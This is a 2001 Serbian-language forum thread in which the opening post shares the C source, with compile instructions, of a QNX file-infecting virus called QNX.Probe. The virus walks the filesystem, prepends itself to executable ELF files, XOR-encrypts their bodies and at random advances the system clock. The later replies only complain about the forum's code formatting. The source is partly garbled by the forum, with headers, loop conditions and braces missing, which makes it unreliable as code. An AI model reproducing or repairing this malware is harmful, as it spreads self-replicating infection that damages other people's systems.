Srodne teme
06.10.2001. QNX kompajler !?
29.08.2003. QNX iz LILO
11.09.2001. QNX-QPR
27.10.2001. QNX opensource
24.01.2002. QNX RTP v6.1 ISO Image
23.02.2002. QNX & HPT370
27.06.2002. DA li neko ima qnx najnoviji i kako bih mogao dam..
01.03.2006. QNX 6.2 je izasao..
13.11.2002. QNX
27.12.2003. Hola, qnx ?
Lista poslednjih: 16, 32, 64, 128 poruka.

QNX virus

[es] :: Zaštita :: QNX virus

[ Pregleda: 3919 | Odgovora: 3 ] > FB > Twit

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Pretraga teme: Traži
Markiranje Štampanje RSS

Nemanja Marjanovic
Centar za Moderno Drustvo Sabac

Član broj: 40
Poruke: 490


icon QNX virus22.09.2001. u 22:08 - pre 276 meseci
QNX VIRUS !!! - 2001-09-21 @ 22:48:18 by Boris Posilovic
OS: QNX; Oblast: Virus; Oba?;

Evo, opet vam donosim još jedan ekskluzivan kod! Ovaj put QNX Virus pod imenom QNX.Probe v1.1. Ovaj crv QNX EFL dolazi kao dokument, crv je parazitskoga tipa, nalazi se u skrivenim procesima tako da se skriva od ostalih korisnika. Inficira EFL dokumente u sistemu, ima QNX playlod dodatak koji je napisan samo za ovaj virus i QNX OS. Ovaj crv je jako opasan, pa zato pazite! Nadam se da vise nećete misliti da samo Windowsi imaju viruse, došlo je vreme UNIX virusa :))). Ovaj virus je prirodan QNX virus, nije klon UNIX virusa.
Treba kompajrilati: cc probeb.c , strip probeb

#include // Declare necessary libraryes

#define virus_len 5440 // Define the size of the virus body

#define work_path "/" // Define the initial directory for scan,
// where virus will be looking for the files

#define byte_block virus_len // Define block size (used while copying)
#define name_len sizeof(our_name) // Define the size of virus name

char our_name[] = "QNX.Probe.b"; // Virus name and the infection mark
// at the same time

int our_fd, tmp_fd; // Declare variables

char buffer[byte_block], buffer1[byte_block], vir_buf[virus_len];

int process_file(const char*, const struct stat*, int); // Declare used
void check_payload(void); // functions

int main(int argc, char **argv, char **envp) // Main function
char *exec_tmp; // Declare yet another variables
ssize_t bytes_cnt;
pid_t pid;
if ((our_fd = open(argv[0], O_RDONLY)) != -1)
// Open currently runned file
{ // If file was opened, proceed the next commands...
if (read(our_fd, vir_buf, virus_len) == -1) exit(-1);
// Read virus_len bytes from this file
exec_tmp = tempnam(NULL, argv[0]);
// Create the name for temporary file
if ((tmp_fd = open(exec_tmp, O_WRONLY|O_CREAT|O_TRUNC, 0400|0200|0100)) == -1)
// And open this file
{ // If an error has occured whilt opening...
close(our_fd); // Close ourself
exit(-1); // Exit with error

{ // Decryption procedure
unsigned csum0; // Declare yet another variable
if (read(our_fd, &csum0, 4) != 4) break;
// Read 4 bytes (there must be the checksum
// of the next going block
bytes_cnt = read(our_fd, buffer, byte_block);
// Read next going block
if (bytes_cnt == 0) break; // If no bytes was readed -
// exit procedure encryption
{ // Decryption
int key = rand() % 10000; // Take random key
int i; // Declare yet another....
unsigned csum=0; // And another....
for(i=0; i {
buffer1 = buffer ^ key; // XOR it with a key
key += our_name[i % name_len] ^ i; // Modify key
for(i=0; i // the uncrypted block
csum += buffer1 ^ i; // Get the checksum
csum = (csum >> 1) | (csum << 31); // Crypt it
if (csum == csum0) break; // If current checksum is equial to
// the saved - stop uncryption
} // Decryption ends
write(tmp_fd, buffer1, bytes_cnt); // Write uncrypted buffer
// to the temp file
} // Finish decription
close(tmp_fd); // Close temp file
close(our_fd); // Close ourself


pid = fork(); // system call fork()
if (pid == 0) // If it is parent process
execve(exec_tmp, argv, envp); // Run temp file
unlink(exec_tmp); // If an error - delete temp file
exit(-1); // and exit with an error
else if (pid > 0) // If it is not a parent process
ftw(work_path, process_file, 1);
// Scan directory tree and for each
// founded file call process_file()
unlink(exec_tmp); // Delete temp file
exit(0); // Exit
} // End of the function "main()"

int process_file(const char *vic_name, const struct stat *status, int type)
{ // Function "process_file()"
int vic_perm, vic_fd, bytes_cnt; // Declare necessary variables
vic_perm = status->st_mode; // Take file permissions
if ((status->st_mode&S_IFREG) && (status->st_mode&(S_IXUSR|S_IXGRP|S_IXOTH)))
{ // If it is a regular and executable file...
char *tmp_name; // Declare......
if (chmod(vic_name, S_IRUSR|S_IWUSR) == -1) return 0;
// Change permissions to the
// readable/writeable for current user
// If an error - exit function
if ((vic_fd = open(vic_name, O_RDWR)) == -1)
// Open victim file for read/write
{ // If an error has occured while opening...
chmod(vic_name, vic_perm); // Restore original permissions
return 0; // Exit function
tmp_name = tempnam(NULL, "tmp"); // Create temp file name
if ((tmp_fd = open(tmp_name, O_WRONLY|O_CREAT|O_TRUNC, 0400|0200|0100)) == -1)
// Open temp file
{ // If an error was occured while opening
close(vic_fd); // Close victim file
chmod(vic_name, vic_perm); // Restore it`s permissions
return 0; // Exit function
if ((bytes_cnt = read(vic_fd, buffer, byte_block)) == -1)
// Read block from victim
{ // If an error...
close(vic_fd); // Close victim file
close(tmp_fd); // Close temp file
unlink(tmp_name); // Delete temp file
chmod(vic_name, vic_perm); // Restore victim`s permissions
return 0; // Exit function
if (bytes_cnt > name_len)
{ // If was readed more than "name_len" bytes
char *i; // Declare.....
for(i=buffer; i<(buffer+byte_block-name_len); i++)
// For all readed bytes
if ((!strcmp(i, our_name)) || (strncmp(buffer+1, "ELF", 3)))
{ // If victim file is infected or isn`t an ELF file
close(vic_fd); // Close victim file
close(tmp_fd); // Close temp file
unlink(tmp_name); // Delete temp file
chmod(vic_name, vic_perm); // Restore permissions
return 0; // Exit function
lseek(vic_fd, 0, SEEK_SET); // Go to the beginning of the victim
write(tmp_fd, vir_buf, virus_len);
// Write virus body to the temp file
while((bytes_cnt = read(vic_fd, buffer, byte_block)) > 0)
// For all bytes of the block of the
// victim body
{ // Encryption procedure
int i; //
int key = rand() % 10000; // Declare...
unsigned csum=0; // And again...
for(i=0; i {
csum += buffer ^ i; // Get the checksum...
csum = (csum >> 1) | (csum << 31); // Crypt it
for(i=0; i {
buffer ^= key; // XOR byte
key += our_name[i % name_len] ^ i; // Modify the key
// } Encryption ends
write(tmp_fd, &csum, 4); // Write checksum to the temp file
write(tmp_fd, buffer, bytes_cnt);
// write block to the temp file
close(vic_fd); // Close victim
close(tmp_fd); // Close temp file
if (rename(tmp_name, vic_name) == -1)
// Rename temp file to the victim
{ // If an error was occured while renaming...
unlink(tmp_name); // Delete temp file
chmod(vic_name, vic_perm); // Restore victim`s permissions
return 0; // Exit function

} // End of the function "process_file()"

void check_payload(void)
{ // Payload function
srand(time(NULL)); // Initialize randomer
if (rand() % 900 == 555) // If random number equal to 555
struct timespec the_time; // Declare.......

clock_gettime(CLOCK_REALTIME, &the_time); // Get calendar time

the_time.tv_sec += (60 * 60) * 24; // Add one day
the_time.tv_nsec = 0; // Must to be zero

clock_settime(CLOCK_REALTIME, &the_time); // Set new calendar time

OVO samo postavio jer je zanimljivo da i male unix verzije mogu imati opasnost od virusa

I don't need a reason!!!

Odgovor na temu

m r v a

Član broj: 8
Poruke: 1843


icon Re: QNX virus22.09.2001. u 23:06 - pre 276 meseci
a yebo vas ...stavljajte kod u [ /code ]
Odgovor na temu

Gojko Vujovic
Amsterdam, NL

Član broj: 1
Poruke: 13651

+165 Profil

icon Re: QNX virus22.09.2001. u 23:33 - pre 276 meseci
Ne vredi mrvo, dok sadrzi <i>, postaje italic i kod ne radi :( Problem sa forumom, znam..
Odgovor na temu

m r v a

Član broj: 8
Poruke: 1843


icon Re: QNX virus23.09.2001. u 01:21 - pre 276 meseci
pih ....... a da mi menjamo software za phorum ......neso cesto cujem rec "BUG" .....
Odgovor na temu

[es] :: Zaštita :: QNX virus

[ Pregleda: 3919 | Odgovora: 3 ] > FB > Twit

Postavi temu Odgovori

Srodne teme
06.10.2001. QNX kompajler !?
29.08.2003. QNX iz LILO
11.09.2001. QNX-QPR
27.10.2001. QNX opensource
24.01.2002. QNX RTP v6.1 ISO Image
23.02.2002. QNX & HPT370
27.06.2002. DA li neko ima qnx najnoviji i kako bih mogao dam..
01.03.2006. QNX 6.2 je izasao..
13.11.2002. QNX
27.12.2003. Hola, qnx ?
Lista poslednjih: 16, 32, 64, 128 poruka.